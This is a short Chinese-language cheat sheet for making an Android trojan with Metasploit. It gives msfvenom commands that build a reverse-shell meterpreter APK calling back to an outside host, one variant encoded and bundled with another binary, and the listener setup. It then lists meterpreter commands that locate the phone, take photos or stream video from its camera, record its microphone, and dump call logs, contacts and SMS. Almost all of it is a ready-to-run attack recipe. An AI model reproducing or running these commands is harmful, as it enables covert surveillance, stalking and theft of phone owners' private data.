Metasploit android 木马
msfconsole #进入Metasploit软件
use android/meterpreter/reverse_tcp #选择payload类型
show options #查看payload所需参数
生成木马
msfvenom -p android/meterpreter/reverse_tcp LHOST=ops.arick.top LPORT=7899 R>~/Desktop/pentest.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=ops.arick.top LPORT=7899 -e x86/shikata_ga_nai -x cc.exe -i 5 R > pentest.apk
开启Metasploit进行监听
使用metasploit监听本地接受数据的端口
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 7899
exploit
对手机进行定位
wlan_geolocate // 使用WLAN信息获取当前地理位置
geolocate // 利用地理定位(GPS)获取当前LAT
调用手机摄像头
webcam_list // 列出网络摄像头
webcam_snap 1 //镜头1或2进行拍照
webcam_chat // 开始视频聊天
webcam_stream -i 1 // 从指定的网络摄像头播放视频流
调用麦克风
record_mic -d x // 从默认麦克风录制音频为X秒
此命令默认录制默认麦克风录制1秒钟的音频,并将尝试不带精度的参数来播放捕获的音频wav文件。
获取通讯记录信息
dump_calllog // 下载目标手机上的通话记录
dump_contacts // 获取联系人列表
dump_sms // 获取短信